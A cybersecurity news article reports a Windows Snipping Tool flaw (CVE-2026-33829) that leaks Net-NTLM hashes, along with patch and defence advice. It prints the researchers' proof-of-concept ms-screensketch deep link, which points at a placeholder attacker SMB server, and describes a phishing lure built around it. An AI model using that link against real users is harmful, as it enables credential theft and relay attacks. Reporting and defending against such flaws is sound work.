Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Critical CVE-2024-XXXXX in GCP Dialogflow Lets Attackers Inject Malicious Code
July 7, 2026
Gentlemen Ransomware Uses Custom EDR/AV Killers to Target Global Industries
July 7, 2026
VECTRA and TeamPCP reverse ransomware kill chain with supply chain credential theft
July 7, 2026
Home/CyberSecurity News/Critical Windows Snipping Tool Bug Leaks NTLM Hashes, PoC Exploit Released
CyberSecurity News

Critical Windows Snipping Tool Bug Leaks NTLM Hashes, PoC Exploit Released

Key Takeaways A critical vulnerability (CVE-2026-33829) in Microsoft’s Windows Snipping Tool has been publicly disclosed. This flaw allows attackers to steal Net-NTLM credential hashes by...

Marcus Rodriguez
Marcus Rodriguez
April 21, 2026 3 Min Read
36 0

Key Takeaways

  • A critical vulnerability (CVE-2026-33829) in Microsoft’s Windows Snipping Tool has been publicly disclosed.
  • This flaw allows attackers to steal Net-NTLM credential hashes by luring victims to a malicious web page.
  • All users of the affected Windows Snipping Tool versions should apply the April 14, 2026, security update immediately.

A significant security vulnerability within Microsoft’s popular Snipping Tool has come to light, accompanied by a publicly available proof-of-concept (PoC) exploit. This flaw enables threat actors to surreptitiously capture users’ Net-NTLM credential hashes by enticing them to visit a specially crafted web page.

Table Of Content

  • Key Takeaways
  • Understanding the Attack Vector
  • Social Engineering Potential
  • Patch Availability and Timeline
  • What You Should Do

Designated as CVE-2026-33829, the vulnerability stems from the Snipping Tool’s handling of deep link Uniform Resource Identifier (URI) registrations, specifically those leveraging the ms-screensketch protocol schema. Affected iterations of the application register this deep link, which incorporates a filePath parameter.

The core issue lies in inadequate input validation. An attacker can exploit this by supplying a Universal Naming Convention (UNC) path that directs to a remote, attacker-controlled Server Message Block (SMB) server. This action forces an authenticated SMB connection, during which the victim’s Net-NTLM hash is transmitted and subsequently captured by the attacker.

The discovery and subsequent reporting of this vulnerability were credited to security researchers at Black Arrow, who worked in coordination with Microsoft prior to the public disclosure.

Understanding the Attack Vector

Exploiting CVE-2026-33829 requires minimal technical proficiency. Attackers merely need to host a malicious URL or an HTML page designed to automatically trigger the deep link, then persuade a target to access it. The PoC developed by Black Arrow Security illustrates this attack with a simple browser-initiated URI:

ms-screensketch:edit?&filePath=<attacker-smb-server>file.png&isTemporary=false&saved=true&source=Toast

When a user clicks this link, the Snipping Tool is activated and silently attempts to retrieve the remote resource via SMB. During this connection attempt, the Windows operating system automatically dispatches the user’s Net-NTLM authentication response to the attacker’s server. This exposes credentials that can then be subjected to offline cracking or utilized in NTLM relay attacks against other resources within the victim’s internal network.

Social Engineering Potential

What makes CVE-2026-33829 particularly concerning is its inherent suitability for social engineering tactics. Because the Snipping Tool visibly launches during the exploitation process, the attack appears legitimate and aligns with plausible scenarios, such as asking an employee to crop a corporate image, modify a badge photo, or review an HR document.

An attacker could, for instance, register a domain like snip.example.com and host an innocuous-looking image URL that, in the background, delivers the malicious deep link payload. The victim would perceive nothing out of the ordinary; the Snipping Tool would open as expected while the NTLM authentication occurs transparently.

This attack vector is especially potent within corporate environments, where phishing emails referencing internal HR portals, IT support systems, or shared document repositories are commonplace and often trusted.

Patch Availability and Timeline

Microsoft has addressed this vulnerability in its April 14, 2026, Patch Tuesday security update. The timeline for disclosure and remediation is as follows:

  • March 23, 2026 — Vulnerability reported to Microsoft.
  • April 14, 2026 — Microsoft releases a security patch.
  • April 14, 2026 — Coordinated public advisory and PoC release.

What You Should Do

  • Apply Updates Immediately: Organizations and individual users running affected versions of the Windows Snipping Tool must apply the April 14, 2026, security update without delay.
  • Monitor Network Traffic: Security teams should actively monitor internal networks for any anomalous outbound SMB connections (typically on port 445) directed towards external or untrusted hosts, as this could indicate an active exploitation attempt.
  • Block Outbound SMB: Implementing a policy to block outbound SMB traffic at the network perimeter is a robust defensive measure, irrespective of patch status, as it can prevent many NTLM hash theft and relay attacks.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackCVEExploitPatchphishingSecurityVulnerability

Share Article

Marcus Rodriguez

Marcus Rodriguez

Marcus is a security researcher and investigative journalist with expertise in vulnerability research, bug bounties, and cloud security. Since 2017, Marcus has been breaking stories on critical vulnerabilities affecting major platforms. His investigative work has led to the disclosure of numerous security flaws and improved defenses across the industry. Marcus is an active participant in bug bounty programs and has been recognized for responsible disclosure practices. He holds multiple security certifications and regularly speaks at industry events.

Previous Post

Critical Gardyn Smart Gardens Flaws Let Attackers Remotely Control Devices

Next Post

SideWinder Hackers Target Government Webmail With Fake Chrome PDF and Zimbra Login Pages

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
AnyDesk Phishing Attack Uses Scheduled Tasks for Persistence, Evades Detection
July 7, 2026
Ubiquiti Discloses 25 UniFi Vulnerabilities, 2 Critical
July 7, 2026
STOCKSTAY Backdoor Targets Ukraine with Malicious RDP Files and WinRAR Exploit
July 7, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
David kimber
David kimber
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us